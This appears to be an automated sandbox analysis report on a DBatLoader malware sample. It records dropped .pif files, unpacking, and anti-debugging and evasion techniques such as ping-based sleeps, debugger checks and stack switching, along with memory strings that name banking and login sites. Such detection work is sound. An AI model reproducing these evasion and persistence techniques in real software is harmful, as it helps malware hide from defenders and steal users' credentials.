Source:	Binary string: easinvoker.pdbGCTL source: E8q16bf9QD.exe, 00000000.00000002.1160502889.0000000020A63000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103403137.0000000000820000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000002.1160502889.0000000020A10000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000002.1163403517.000000007EFE0000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103403137.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1102777550.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000002.1366673242.0000000000890000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.1137755418.0000000005890000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, alpha.pif, 00000009.00000002.1168643613.0000000000251000.00000020.00000001.01000000.00000008.sdmp, alpha.pif, 0000000A.00000002.1172361748.0000000000251000.00000020.00000001.01000000.00000008.sdmp, alpha.pif.8.dr
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oSAWneqzPiahr.exe, 00000013.00000000.1286142881.000000000079F000.00000002.00000001.01000000.0000000A.sdmp, oSAWneqzPiahr.exe, 00000015.00000000.1437227707.000000000079F000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Links\iaoqralA.pif

Unpacked PE file: 6.2.iaoqralA.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;

Yara detected DBatLoader

Source: Yara match	File source: 0.2.E8q16bf9QD.exe.22f6178.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.E8q16bf9QD.exe.2cf0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.E8q16bf9QD.exe.22f6178.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1109334808.00000000022F6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: iaoqralA.pif.0.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

Code function: 0_2_02D03F9C LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,

0_2_02D03F9C

Source: alpha.pif.8.dr

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D172AC push 02D17317h; ret	0_2_02D1730F
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CF3210 push eax; ret	0_2_02CF324C
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D0539C push 02D053D4h; ret	0_2_02D053CC
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CFC39A push 02CFC7F2h; ret	0_2_02CFC7EA
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CF634E push 02CF6392h; ret	0_2_02CF638A
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CF6350 push 02CF6392h; ret	0_2_02CF638A
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D030B0 push 02D0315Bh; ret	0_2_02D03153
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D170AC push 02D17125h; ret	0_2_02D1711D
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D030AE push 02D0315Bh; ret	0_2_02D03153
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D171F8 push 02D17288h; ret	0_2_02D17280
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D17144 push 02D171ECh; ret	0_2_02D171E4
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D04100 push 02D04138h; ret	0_2_02D04130
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CFF6C8 push 02CFF73Eh; ret	0_2_02CFF736
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CFC66C push 02CFC7F2h; ret	0_2_02CFC7EA
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CFF7D4 push 02CFF821h; ret	0_2_02CFF819
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CFF7D3 push 02CFF821h; ret	0_2_02CFF819
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D187B4 pushad ; iretd	0_2_02D187B6
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D187AB pushad ; iretd	0_2_02D187B2
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D07484 push 02D074BCh; ret	0_2_02D074B4
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D025E4 push ecx; mov dword ptr [esp], edx	0_2_02D025E6
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D0AA64 push ecx; mov dword ptr [esp], edx	0_2_02D0AA69
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D0AA00 push ecx; mov dword ptr [esp], edx	0_2_02D0AA05
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CFF863 push 02CFF821h; ret	0_2_02CFF819
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D03EBC push 02D03EFEh; ret	0_2_02D03EF6
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CFBFEC push ecx; mov dword ptr [esp], edx	0_2_02CFBFF1
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CF5F84 push 02CF5FDFh; ret	0_2_02CF5FD7
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CF5F82 push 02CF5FDFh; ret	0_2_02CF5FD7
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CFCFB4 push 02CFCFE0h; ret	0_2_02CFCFD8
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D15DF4 push 02D15FEEh; ret	0_2_02D15FE6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_0040114B push ecx; retf	6_2_0040114C
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_00401978 pushfd ; retf	6_2_0040197C

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	File created: C:\Users\user\Links\iaoqralA.pif			Jump to dropped file

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	File created: C:\Users\user\Links\iaoqralA.pif			Jump to dropped file

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

Code function: 0_2_02D078FC GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_02D078FC

Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Memory allocated: 2CF0000 memory commit 500064256	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Memory allocated: 2CF1000 memory commit 500154368	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Memory allocated: 2D17000 memory commit 500002816	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Memory allocated: 2D18000 memory commit 500047872	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Memory allocated: 2D23000 memory commit 500015104	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Memory allocated: 2D27000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Memory allocated: 2D28000 memory commit 500015104	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFD3122D324
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFD3122D7E4
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFD3122D944
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFD3122D504
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFD3122D544
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFD3122D1E4
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFD31230154
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFD3122DA44

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10			Jump to behavior

Source: C:\Users\user\Links\iaoqralA.pif

Code function: 6_2_1BE7BBA0 rdtsc

6_2_1BE7BBA0

Source: C:\Windows\SysWOW64\systeminfo.exe	Window / User API: threadDelayed 7481			Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Window / User API: threadDelayed 2491			Jump to behavior

Source: C:\Users\user\Links\iaoqralA.pif	API coverage: 0.8 %
Source: C:\Users\Public\alpha.pif	API coverage: 6.3 %
Source: C:\Windows\SysWOW64\systeminfo.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7292	Thread sleep count: 7481 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7292	Thread sleep time: -14962000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7292	Thread sleep count: 2491 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7292	Thread sleep time: -4982000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe TID: 7324	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe TID: 7324	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe TID: 7324	Thread sleep time: -43000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe TID: 7324	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe TID: 7324	Thread sleep time: -52500s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systeminfo.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systeminfo.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CF54D0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_02CF54D0
Source: C:\Users\Public\alpha.pif	Code function: 9_2_00260207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	9_2_00260207
Source: C:\Users\Public\alpha.pif	Code function: 9_2_0026589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	9_2_0026589A
Source: C:\Users\Public\alpha.pif	Code function: 9_2_00273E66 FindFirstFileW,FindNextFileW,FindClose,	9_2_00273E66
Source: C:\Users\Public\alpha.pif	Code function: 9_2_00264EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	9_2_00264EC1
Source: C:\Users\Public\alpha.pif	Code function: 9_2_0025532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	9_2_0025532E
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_0066C530 FindFirstFileW,FindNextFileW,FindClose,	20_2_0066C530

Source: 61b83Fh.20.dr	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: 61b83Fh.20.dr	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: 61b83Fh.20.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: 61b83Fh.20.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: 61b83Fh.20.dr	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: 61b83Fh.20.dr	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: 61b83Fh.20.dr	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: systeminfo.exe, 00000014.00000002.3574904730.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
Source: 61b83Fh.20.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: 61b83Fh.20.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: 61b83Fh.20.dr	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: 61b83Fh.20.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: 61b83Fh.20.dr	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: 61b83Fh.20.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: oSAWneqzPiahr.exe, 00000015.00000002.3575988448.0000000001249000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: 61b83Fh.20.dr	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: E8q16bf9QD.exe, 00000000.00000002.1108434517.000000000078E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.1658458179.000002EC9FFFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 61b83Fh.20.dr	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: 61b83Fh.20.dr	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: 61b83Fh.20.dr	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: 61b83Fh.20.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: 61b83Fh.20.dr	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: 61b83Fh.20.dr	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: 61b83Fh.20.dr	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: 61b83Fh.20.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: 61b83Fh.20.dr	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: 61b83Fh.20.dr	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: 61b83Fh.20.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: 61b83Fh.20.dr	Binary or memory string: global block list test formVMware20,11696501413
Source: 61b83Fh.20.dr	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: 61b83Fh.20.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: 61b83Fh.20.dr	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: 61b83Fh.20.dr	Binary or memory string: discord.comVMware20,11696501413f
Source: 61b83Fh.20.dr	Binary or memory string: AMC password management pageVMware20,11696501413

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

API call chain: ExitProcess graph end node

graph_0-26402

Source: C:\Users\user\Links\iaoqralA.pif

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

Code function: 0_2_02D0AF3C GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_02D0AF3C

Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Links\iaoqralA.pif	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Links\iaoqralA.pif

Code function: 6_2_1BE7BBA0 rdtsc

6_2_1BE7BBA0

Source: C:\Users\user\Links\iaoqralA.pif

Code function: 6_2_00417793 LdrLoadDll,

6_2_00417793

Source: C:\Users\Public\alpha.pif

Code function: 9_2_00272E37 IsDebuggerPresent,

9_2_00272E37

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

Code function: 0_2_02D03F9C LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,

0_2_02D03F9C

Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FBF3 mov eax, dword ptr fs:[00000030h]	6_2_1BF0FBF3
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE91BEF mov eax, dword ptr fs:[00000030h]	6_2_1BE91BEF
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE91BEF mov eax, dword ptr fs:[00000030h]	6_2_1BE91BEF
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE59BC4 mov eax, dword ptr fs:[00000030h]	6_2_1BE59BC4
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47BCD mov eax, dword ptr fs:[00000030h]	6_2_1BE47BCD
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47BCD mov ecx, dword ptr fs:[00000030h]	6_2_1BE47BCD
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63BD6 mov eax, dword ptr fs:[00000030h]	6_2_1BE63BD6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63BD6 mov eax, dword ptr fs:[00000030h]	6_2_1BE63BD6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63BD6 mov eax, dword ptr fs:[00000030h]	6_2_1BE63BD6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63BD6 mov eax, dword ptr fs:[00000030h]	6_2_1BE63BD6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63BD6 mov eax, dword ptr fs:[00000030h]	6_2_1BE63BD6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDFBDC mov eax, dword ptr fs:[00000030h]	6_2_1BEDFBDC
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDFBDC mov eax, dword ptr fs:[00000030h]	6_2_1BEDFBDC
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDFBDC mov eax, dword ptr fs:[00000030h]	6_2_1BEDFBDC
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7DBA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7DBA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7DBA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7DBA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7DBA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7DBA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7DBA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7DBA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7DBA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7DBA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7DBA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7DBA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FB97 mov eax, dword ptr fs:[00000030h]	6_2_1BF0FB97
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE89B9F mov eax, dword ptr fs:[00000030h]	6_2_1BE89B9F
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE89B9F mov eax, dword ptr fs:[00000030h]	6_2_1BE89B9F
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE89B9F mov eax, dword ptr fs:[00000030h]	6_2_1BE89B9F
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF19B8B mov eax, dword ptr fs:[00000030h]	6_2_1BF19B8B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF19B8B mov eax, dword ptr fs:[00000030h]	6_2_1BF19B8B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF3B60 mov eax, dword ptr fs:[00000030h]	6_2_1BEF3B60
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF3B60 mov eax, dword ptr fs:[00000030h]	6_2_1BEF3B60
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF3B60 mov eax, dword ptr fs:[00000030h]	6_2_1BEF3B60
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF3B60 mov eax, dword ptr fs:[00000030h]	6_2_1BEF3B60
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF3B60 mov eax, dword ptr fs:[00000030h]	6_2_1BEF3B60
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4FB4C mov edi, dword ptr fs:[00000030h]	6_2_1BE4FB4C
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEE5B50 mov eax, dword ptr fs:[00000030h]	6_2_1BEE5B50
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEE5B50 mov eax, dword ptr fs:[00000030h]	6_2_1BEE5B50
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE89B28 mov eax, dword ptr fs:[00000030h]	6_2_1BE89B28
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE89B28 mov eax, dword ptr fs:[00000030h]	6_2_1BE89B28
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE51B04 mov eax, dword ptr fs:[00000030h]	6_2_1BE51B04
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE51B04 mov eax, dword ptr fs:[00000030h]	6_2_1BE51B04
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7DB00 mov eax, dword ptr fs:[00000030h]	6_2_1BE7DB00
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7DB00 mov eax, dword ptr fs:[00000030h]	6_2_1BE7DB00
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7DB00 mov eax, dword ptr fs:[00000030h]	6_2_1BE7DB00
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7DB00 mov eax, dword ptr fs:[00000030h]	6_2_1BE7DB00
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7DB00 mov eax, dword ptr fs:[00000030h]	6_2_1BE7DB00
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7DB00 mov edx, dword ptr fs:[00000030h]	6_2_1BE7DB00
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FB0C mov eax, dword ptr fs:[00000030h]	6_2_1BF0FB0C
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4BAE0 mov eax, dword ptr fs:[00000030h]	6_2_1BE4BAE0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED1ACB mov eax, dword ptr fs:[00000030h]	6_2_1BED1ACB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED1ACB mov ecx, dword ptr fs:[00000030h]	6_2_1BED1ACB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7BADA mov eax, dword ptr fs:[00000030h]	6_2_1BE7BADA
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEE5AD0 mov eax, dword ptr fs:[00000030h]	6_2_1BEE5AD0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4FAA4 mov ecx, dword ptr fs:[00000030h]	6_2_1BE4FAA4
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFDAAC mov ecx, dword ptr fs:[00000030h]	6_2_1BEFDAAC
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFDAAC mov ecx, dword ptr fs:[00000030h]	6_2_1BEFDAAC
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFDAAC mov eax, dword ptr fs:[00000030h]	6_2_1BEFDAAC
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BAA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE5BAA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BAA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE5BAA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7DAAE mov eax, dword ptr fs:[00000030h]	6_2_1BE7DAAE
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF01AA3 mov eax, dword ptr fs:[00000030h]	6_2_1BF01AA3
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF01AA3 mov eax, dword ptr fs:[00000030h]	6_2_1BF01AA3
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF01AA3 mov eax, dword ptr fs:[00000030h]	6_2_1BF01AA3
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47A80 mov eax, dword ptr fs:[00000030h]	6_2_1BE47A80
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47A80 mov eax, dword ptr fs:[00000030h]	6_2_1BE47A80
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47A80 mov eax, dword ptr fs:[00000030h]	6_2_1BE47A80
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FA87 mov eax, dword ptr fs:[00000030h]	6_2_1BF0FA87
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEE3A78 mov eax, dword ptr fs:[00000030h]	6_2_1BEE3A78
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEE3A78 mov eax, dword ptr fs:[00000030h]	6_2_1BEE3A78
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEE3A78 mov eax, dword ptr fs:[00000030h]	6_2_1BEE3A78
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEE3A78 mov eax, dword ptr fs:[00000030h]	6_2_1BEE3A78
